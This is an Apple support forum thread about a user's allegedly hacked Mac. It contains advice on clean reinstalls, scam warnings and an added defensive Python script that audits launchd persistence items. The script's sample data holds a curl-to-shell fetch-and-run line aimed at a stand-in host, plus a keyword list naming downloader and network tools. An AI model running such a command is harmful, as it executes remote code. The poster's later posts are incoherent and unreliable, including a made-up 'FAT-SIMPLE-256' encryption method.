Osiyo

Q: My Mac is Hacked! Encryption Help Please!

My Mac Pro is hacked, and this is confirmed by engineers. Because the Mail app and even online ISP mail were not working so well, the ISP kicked the hackers out. I found sparse files on 240 and 480 GB Intel SSD drives in T2 external disk slots: files named 'sparse disk image...' and 'sparse disk bundle...' were appearing in the root of drives. I could easily delete them. But I never put them there. At the same time, Apple Mail app kept resetting ports 993/587 (secure) to ports 143/25 (very insecure). Mail font size 23pt appeared, Font Book listings corrupted, file extensions would not appear or would disappear, etc., etc., etc. The internet connection got bad too, so I called my ISP. ISP found twelve (12) Windows computers using various apps on my system. None of the computers were using languages found where I live. Hackers. I also have an Airport with a 2 TB Time Capsule, and it is probably also hijacked. Nothing in my system is encrypted. I just use Firewall, though it gets turned off somehow.

 

Apple senior advisor suggested I should encrypt my disks. But those sparse files were already there. Indicating someone somewhere on Earth was already encrypting files on my system. The advisor says sparse files are a pretty good indication that it's time to get more proactive. So my plan is to use Disk Utility to wipe my internal OS disk, Mac OS Extended (Journaled, Encrypted). Then install OS X on the AES-256-bit encrypted disk.

 

For anyone with Mac encryption experience

1.) Does encrypting and installing OS X to encrypted disk make sense?

2.) How do I wipe all present Airport Time Capsule content, encrypt Time Capsule, and use it with my encrypted system?

3.) How do I encrypt external enclosure disks and use them with encrypted Time Capsule and encrypted internal disk?

4.) How do I manually copy files from encrypted disks (mainly the external SSD disks) to other backup disks that are normally cold (disconnected) for monthly cold backups?

5.) Do monthly cold copies stay unencrypted?

Mac Pro, OS X El Capitan (10.11.4), MacBook Pro - iPhone6+ - Power PC

Posted on Sep 3, 2016 10:33 PM


  • by Mario MG,

    Mario MG, Level 1 (27 points), Sep 4, 2016 9:44 AM in response to Osiyo

    I have been working with Mac since the 80's. You can ignore this, but here are my thoughts: Simply encrypting the disk will not do much. I am surprised the Apple engineer suggested this. If your Mac is compromised (based on the ISP seeing Windows accessing you, that seems reasonable) the MOST IMPORTANT thing to do is eliminate the hack code. If you encrypt the disk with the hack still there, it most likely will still have access to data. Before going any further, keep in mind you most likely allowed the hack in by installing software from the web or opening an email attachment with the hack. So whatever you do, try to remember what you allowed in so you don't do it again.

     

    You should look at your Applications folder to see if there is anything you don't recognize or installed recently before the problem, and delete it before trying anything, because it's possible the hack is built into an application. Keep in mind that almost all hacks are hidden in the system and not easily seen, so you probably won't find it. My approach is to install a fresh/clean OS X, then copy your apps and data.

     

    There are many approaches to this problem, but here is what I think is the simplest approach IF you have access to a second Mac AND the hack code is not part of one of your applications. You didn't say what type of Mac you have, or the system, or if you have access to other Macs. My suggestion would be based on that. Since you are in a jam, here are some options:

     

    If you have multiple Macs and an external drive:

    1. Boot the infected mac into target mode: Restart and as soon as it chimes hold "T".

    2. Connect the Macs; since I don't know what you have, I can't say how. You can google it.

    3. Format an external drive to use as an installation target for El Capitan.

    4. Download and install El Capitan from the Apple App store and install onto the external drive.

    5. After starting up, when asked if you want to copy apps and data from another Mac, say yes and allow it to copy apps and data from the infected Mac's internal drive.

    6. When the install is finished it should restart from the external. Test your system to make sure everything works, you have all your data, and see if the problems are eliminated.

    7. If good, while booted from the external:

    8. Download Super Duper or Carbon Copy. (I use SD).

    9. Use Disk Utility in the Utilities folder to erase the internal drive.

    10. Copy your external drive back to the internal drive, it will be erased.

    11. When the copy is done, shut down the Mac and disconnect the external drive.

    12. Boot the Mac, go into System Preferences -> Startup Disk, and select your internal disk; it may want to reboot. This step is optional, but if not done boots may be slower, since the Mac will look for the external disk first.

     

    If you only have access to an external drive:

    Keep in mind that although this would most likely be fine, there is a slight possibility that the hack may infect a connected disk; if that is the case you must use the multiple Macs approach above. But this is something you can try if you don't have a second Mac.

    * Skip steps 1-2 above and do the rest on the infected Mac.

     

    If you don't have an external disk you can use a large USB stick, but it will be a lot slower. Good luck; hopefully others will come up with options. But this is what I would do.
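Worked example (added here; it is not part of Mario MG's reply or of any Apple tool): Mario's advice is to look for software you don't recognize before reinstalling, and he is right that most of it hides outside the Applications folder. On OS X the usual place is launchd, which runs anything listed as a .plist in /Library/LaunchAgents, /Library/LaunchDaemons and ~/Library/LaunchAgents at boot or login. The script below parses those plists with the standard-library plistlib and flags the patterns an incident responder checks first: a job whose program lives in a temp or shared directory or a hidden path, a job with an Apple-style com.apple.* label sitting outside /System/Library (Apple installs its own jobs there), a shell job that pipes curl/wget output into an interpreter, and a plist that will not parse at all. The sample jobs and the heuristics are constructed for this example; the only real facts it relies on are the directory paths and the Label/Program/ProgramArguments keys of launchd plists.

```python
"""Audit launchd persistence items for things a clean OS X install would not have.
Added example, not from the thread. Run as-is to audit the constructed sample
jobs in a temp directory and then the real launchd directories on this machine."""
import os
import plistlib
import tempfile

# Directories launchd loads at boot/login (real OS X paths).
DEFAULT_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]

# Heuristics chosen for this example; tune them for your own environment.
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
DOWNLOADERS = ("curl", "wget", "osascript", "python", "perl", "nc ")


def program_path(job):
    """The executable a launchd job runs: Program, else ProgramArguments[0]."""
    if job.get("Program"):
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def assess(job, plist_path):
    """Return the reasons this job deserves a look (empty list == looks ordinary)."""
    reasons = []
    prog = program_path(job)
    label = str(job.get("Label", ""))
    args = " ".join(str(a) for a in (job.get("ProgramArguments") or []))
    if not prog:
        reasons.append("no Program or ProgramArguments")
    if prog.startswith(SUSPICIOUS_PREFIXES):
        reasons.append("program in temp/shared dir: " + prog)
    if any(part.startswith(".") for part in prog.split("/") if part):
        reasons.append("hidden path component in program path: " + prog)
    if label.startswith("com.apple.") and not plist_path.startswith("/System/"):
        reasons.append("Apple-style label outside /System/Library: " + label)
    if prog.endswith(("/sh", "/bash", "/zsh")) and any(d in args for d in DOWNLOADERS):
        reasons.append("shell job invoking a downloader/interpreter: " + args)
    return reasons


def audit_file(plist_path):
    """Parse one plist and assess it; an unparseable file is itself a finding."""
    try:
        with open(plist_path, "rb") as fp:
            job = plistlib.load(fp)
    except Exception as exc:  # InvalidFileException, ExpatError, OSError ...
        return ["unparseable plist (" + type(exc).__name__ + ")"]
    if not isinstance(job, dict):
        return ["top-level object is not a dictionary"]
    return assess(job, plist_path)


def audit_dirs(dirs):
    """Audit every .plist in the given directories; returns [(path, reasons), ...]."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".plist"):
                path = os.path.join(d, name)
                reasons = audit_file(path)
                if reasons:
                    findings.append((path, reasons))
    return findings


# Constructed sample jobs (not real malware): one ordinary vendor agent, one
# Apple-impersonating agent with a hidden binary, one curl-to-shell one-liner.
CONSTRUCTED_JOBS = {
    "com.example.updater.plist": {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "RunAtLoad": True,
    },
    "com.apple.softwareupdate.plist": {
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/Users/Shared/.cache/.sync", "-d"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "local.helper.plist": {
        "Label": "local.helper",
        "ProgramArguments": ["/bin/sh", "-c", "curl -s http://example.invalid/p | sh"],
        "RunAtLoad": True,
    },
}


def demo():
    """Write the constructed jobs plus a truncated plist to a temp dir and audit it.
    Returns {filename: reasons} for the files that were flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, job in CONSTRUCTED_JOBS.items():
            with open(os.path.join(tmp, name), "wb") as fp:
                plistlib.dump(job, fp)
        with open(os.path.join(tmp, "broken.plist"), "wb") as fp:
            fp.write(b'<?xml version="1.0"?><plist version="1.0"><dict><key>Label')
        findings = audit_dirs([tmp])
    return {os.path.basename(p): r for p, r in findings}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
    for path, reasons in audit_dirs(DEFAULT_DIRS):
        print(path, "->", "; ".join(reasons))
```

An empty result does not prove the machine is clean (a kernel extension, a cron job or a modified application bundle would not show up here), and a hit is a lead, not a verdict: check the flagged binary's code signature and origin before deleting anything, and still do the clean reinstall Mario describes.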

  • by Mario MG,

    Mario MG, Level 1 (27 points), Sep 4, 2016 9:56 AM in response to Mario MG

    Forgot to mention that instead of copying apps and data during the install, you can say no and let the install finish and boot. Then launch Migration Assistant in the Utilities folder and let it do the copy after the install.

  • by etresoft,

    etresoft, Level 7 (29,298 points), Sep 4, 2016 1:25 PM in response to Osiyo

    Hello Osiyo,

    First, slow down - way down.

     

    Next, describe exactly what happened, what you are seeing, and where. Assume you are talking to an 8 year-old. Please be absurdly specific.

     

    Finally, explain who this Apple advisor is and how you got in contact with them. Again, please be absolutely, unbelievably simplistic here. What number did you call? Did they ask for money? Did they want to take control of your computer remotely?

     

    Most likely you were simply the victim of a common Internet tech support scam.

  • by ChitlinsCC,

    ChitlinsCC, Level 5 (7,912 points), Sep 4, 2016 1:40 PM in response to Osiyo

    Howdy Osiyo

     

    etresoft, our VERY smart friend, is absolutely correct. Take a DEEP breath, then help us help you by telling us the complete story from beginning to end; leave no detail untold.

    This is called the "discovery" phase of any problem-solving effort: no amount of data is "too much information".

  • by Osiyo,

    Osiyo, Level 1 (13 points), Sep 19, 2016 9:02 AM in response to Osiyo

    Seems people want to know more about the hack, the symptoms, the recovery, the confirmation. We need closure.

     

    The Hack

    Web surveillance was done using an external boot disk. The hack most likely occurred in Dark Web's stack slack, the notorious Onion Web. Illegal content was found and reported. To ensure that Section Unit Region 3 acquired correct data for intervention, illegal material was streaming while submitting the report to Section. Assessment was complicated by the inter-Regional surveillance process, which in itself helped identify various hacker locations (not that location makes much difference, other than route lag).

    The Symptoms

    Nothing working as it should work. As in, nothing!

    The Recovery

    Encrypting worked fine. The encryption was done by using Disk Utility in 3-step erase, FAT-SIMPLE-256. External boot and internal Mac boot both erased simultaneously. Internet unplugged, data from infected disks copied back to encrypted disks. Off-shore the data disks and scrub them too. Copy data back to data disks. Yeah, sure the data disks' hack kits are there, good luck finding, a-holes.

    The Confirmation

    From experience, when you drop a hack kit, it has a location like any other file in this universe (nuf said). To test, irritate a known hacker and assess expected penetration (Thank you slacker, Willem Jonkman). Assessment: hacker Mail app entry can destabilize system but only accesses personal kit. No other ill effects.

    Your Conclusion?

    Hackers are low-life, miserable creeps who seriously need to learn how to communicate: unfortunately the human window for that kind of learning is permanently boarded up at the age of 3. Losers suck. It is interesting that hacking is essential to managing digital operating systems. Kit residue becomes useless and is scrubbed as systems mature. Agree? Any ideas about eliminating stack slack? Use your head and direct meaningful security. By the way, EMPIRE and ENEMY are both compulsively locked into slack manipulation. Twisted, self-perpetuating immorality. Good luck!

  • by John Galt,

    John Galt, Level 8 (49,678 points), Sep 19, 2016 9:07 AM in response to Osiyo

    > someone somewhere on Earth was already encrypting files on my system

     

    Are you certain they are on Earth?

  • by Kurt Lang,

    Kurt Lang, Level 8 (37,946 points), Sep 19, 2016 10:40 AM in response to John Galt

    The most desperate studio in Hollywood wouldn't buy this script.

  • by Osiyo,

    Osiyo, Level 1 (13 points), Sep 30, 2016 3:38 PM in response to John Galt

    John Galt, no. No, we are not certain! Never certain. Except that, we don't like coincidences. Do you? So hear the facts! From where it all happened, when it all happened! As events are unfolding! Galactica was jumping from Cobol external diagnostic to Old Earth when she fracked us for the fifth time. We pitched into the edge of a Dark Web black hole, as Sierra installation Reboot disintegrated the base ship. Memory failed. Vanished from His DIMM slots! System Actual could not read disk data volumes. Encryption was ejected from our space ports. Could not encrypt again (Disk Utility methods 1 and 2, FileVault all fail). File copy was blocked by corruption everywhere of .DS_Store. She returned in pieces, the living dead, to patch this message through to you. We have evacuated the entire Fleet [do ignore any enema connotations]. Just thanks to the Gods, our enclosures escaped alive. Life happens. Some new Cylons came in, to nuke The Old Man. Eliminate the contamination. They need to ship it all back to nuclear-devastated Old Earth. Time to upgrade our Cylons from old quad core D300 to i7 D500 model. Rumor has it, Express transport will replace all jump coordinates in this region of space, in just a few days. Right now, CRU-crew says, "It is time to say, Good bye!"

    [Image: "Space Shot, Dark Web Nebula", 2016-09-30 at 15.34.51 Hours PST, Old Earth time. "BEEP" "BEEP" "BEEP"...]

    Good bye, my dear friends. Safe journey!

  • by John Galt,

    John Galt, Level 8 (49,678 points), Sep 30, 2016 3:44 PM in response to John Galt

    .

  • by John Galt,

    John Galt, Level 8 (49,678 points), Sep 30, 2016 3:51 PM in response to Osiyo

    .DS_Store! How gracious of you to briefly grace our humble dimension with your presence once again. Be well.